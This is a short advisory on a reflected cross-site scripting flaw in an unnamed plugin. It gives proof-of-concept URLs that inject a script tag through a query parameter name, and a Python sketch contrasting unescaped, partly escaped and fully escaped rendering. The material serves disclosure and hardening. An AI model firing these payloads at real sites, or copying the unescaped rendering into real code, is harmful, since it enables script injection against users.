The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting.
https://example.com/top-user-rated-listings?listview=2&q"><script>alert(1)<%2Fscript>=1
https://example.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&m"><script>alert(1)<%2Fscript>=1
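
In both URLs the markup sits in the parameter name, not its value, so escaping values alone does not close the hole. The sketch below is an added example, not the plugin's code: it assumes the page re-emits the current query parameters as hidden form fields (the advisory does not say how the reflection happens), and all function names are hypothetical.

```python
from html import escape
from urllib.parse import parse_qsl

# Query string based on the first proof-of-concept URL above: the markup is in
# the parameter *name*; the value is just "1".
POC_QUERY = 'listview=2&q"><script>alert(1)<%2Fscript>=1'


def hidden_fields_unescaped(query: str) -> str:
    """Vulnerable pattern: names and values are written into the page as-is."""
    return "\n".join(
        f'<input type="hidden" name="{name}" value="{value}">'
        for name, value in parse_qsl(query, keep_blank_values=True)
    )


def hidden_fields_values_only(query: str) -> str:
    """Incomplete fix: the value is escaped, the name is still a raw sink."""
    return "\n".join(
        f'<input type="hidden" name="{name}" value="{escape(value, quote=True)}">'
        for name, value in parse_qsl(query, keep_blank_values=True)
    )


def hidden_fields_escaped(query: str) -> str:
    """Hardened: every request-derived string is escaped for attribute context."""
    return "\n".join(
        f'<input type="hidden" name="{escape(name, quote=True)}" '
        f'value="{escape(value, quote=True)}">'
        for name, value in parse_qsl(query, keep_blank_values=True)
    )


if __name__ == "__main__":
    for render in (hidden_fields_unescaped, hidden_fields_values_only,
                   hidden_fields_escaped):
        print(f"--- {render.__name__}\n{render(POC_QUERY)}")
```

A regression test for the fix should therefore send the probe string as a parameter name as well as a value and check that it only ever comes back entity-encoded.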